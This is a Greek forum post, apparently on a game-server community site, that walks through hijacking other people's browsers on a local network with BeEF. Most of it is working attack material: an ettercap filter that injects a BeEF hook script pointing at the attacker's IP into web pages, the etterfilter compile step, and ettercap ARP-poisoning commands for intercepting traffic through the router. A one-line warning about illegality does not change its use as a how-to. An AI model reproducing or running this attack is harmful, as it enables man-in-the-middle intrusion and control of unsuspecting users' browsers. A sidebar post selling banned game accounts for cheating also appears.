Jump to content

[GR]Πως εισβαλλω σε ξενο υπολογιστη-Browser explotation framework


Recommended Posts

Εισαγωγη

Γεια σας και παλι!Αποφασισα να κανω εναν οδηγο με το πως μπορειτε να εισβαλεται σε εναν υπολογιστη μεσω του browser του!Προσοχη:Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Tι θα χρειαστουμε?

Μα φυσικα Βacktrack 5 και το Cross-Site-Sctript (xss)

Ξεκινωντας

Παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα

#GreyHat
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");
      }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "</head>")) {
        replace("</head>", "</head><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> ");
        msg("EPIASES_LAYRAKIn");
    }
    if (search(DATA.data, "</HEAD>")) {
        replace("</HEAD>", "</HEAD><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> ");
        msg("epiases_layrakin");
    }
}

Eκει που γραφει http://192.168.1.66  θα πρεπει να βαλετε την δικη σας ip.

Ξεκινωντας Την Διαδικασια

Μετα αφου καναμε τα παραπανω ,παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef και παταμε να ανοιξει.

8333395.png

Μετα παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ και παταω open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

8333403.png

Αλλαξτε το http://127.0.0.1/beef με την δικια σας ip πχ http://192.168.1.66/beef ,πατα apply config και finished.

Τωρα για να δειτε τι κανει το beEF ακριβως μπορειτε να το δοκιμασετε σε εσας αν πατε στο view spawn zombie example

και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .Πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

8333406.png

Και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss

8333412.png

Υπαρχουνε παρα πολλες επιλογες οπως: Nα εισβαλετε στον υπολογιστη του,Nα τον ανακατευθυνετε σε αλλη σελιδα κτλπ.

Τωρα πως κανουμε το θυμα να ενωθει μαζι μας;Ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο(terminal) και γραφουμε

 etterfilter /root/Desktop/xssbeef -ο xssbeef.ef

Μετα μας εμφανιζει αυτο

 

etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA

 

12 protocol tables loaded:

    DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 

11 constants loaded:

    VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 

Parsing source file '/root/Desktop/xssbeef'  done.

 

Unfolding the meta-tree  done.

 

Converting labels to real offsets  done.

 

Writing output to 'filter.ef'  done.

 

-> Script encoded into 20 instructions.

Μετα γραφουμε στο τερματικο,

ettercap -G

μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift u επιλεγουμε wlan0 μετα ctrl s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα

8333419.png

Τελος,παταμε ctrl  w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες)Αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας

 ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0

8333425.png

 

Θελει αρκετη δουλεια μεχρι να μαθετε να χειριζεστε καλα ολο αυτο το συστημα..Συμβουλη -- Μην το βαζετε κατω και προσπαθηστε , θα δειτε οτι στο τελος ειναι απλο!

Ελπιζω να βοηθησα ευχαριστω

Link to comment
Share on other sites

  • 7 months later...

an thes anefere kai tin pigi apo tous odigous pou bazis min tous pasaris gia dikous sou giati den einai...

 

trelenome otan kanete  copy-paste kai pasarete otidipote einai auto gia diko sas kai stin pragmatikotita den kserete pou pane ta 4. to palikari pou tous ebale exei afierosi xrono kai merika atoma to paizoun  << xaker >>

 

twra pou klidose tin selida katse grafta me to xeri

Link to comment
Share on other sites

  • 3 weeks later...
  • 1 month later...
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • 💫 Hello friends Today im offering selling glitch league accs ❓What it does mean❓ there's accounts which get perma banned on server while they are still working ❓What i can benefit from this❓ you can play on the acc without getting banned or get hwid bans because its already on server side banned xD ✨ the account doesnt belong to me , they are NFA ( not full access accs ) and only username & password will be given ( not full info no email ) you cant take the ownership of the account only you can use it to script as much as you can without caring about anything here you are a proof :- https://imgur.com/MkajddR https://imgur.com/mY492Dv 💲Im selling acc for 10$ Each if you are interested you can reach me via dm or discord :- khaled.mohamed Thanks for your time and have a good day 💫
    • Hello, I recently Installed the h5 Interface from emu-dev   Everything is working great but i was wondering if anyone can help me add the monster book and item book buttons on my community board to make it more accessible. Or if there is a way to add a button with HTML that calls these windows. I have xdat editor installed and i have located the relevant windows, but i don't know what to do with them. Thank you for your time.  
    • Add Support ShortCutPanel https://jumpshare.com/s/VTm9x1wvHmPokrqomNun
    • Καλησπερα μαγκες θα ηθελα εναν Dev ( που να γνωριζει καλα την δουλεια ) να ξεκινησουμε εξολοκληρου ενα Interlude PVP σερβερ που εχω στο μυαλο μου! Παρακαλω πολυ στειλτε μου προσωπικο στο προφιλ μου εδω για περαιτερω πληροφοριες! Ευχαριστω!
    • Open github. Find sdark94 account. Enter sdark94/trinity repository. Search for the DB backup. It is still there. I would've posted it here, if there was a HIDE_FOR_USER(S) feature, but there isn't one. You can DM me on Discord and I'll slip you a STRUCTURE-only DB export.   Yall lazy to even search the web bro. 😄 See the old videos from 3 years ago -> YOUTUBE Regarding java version, it is also visible in the source:
  • Topics

×
×
  • Create New...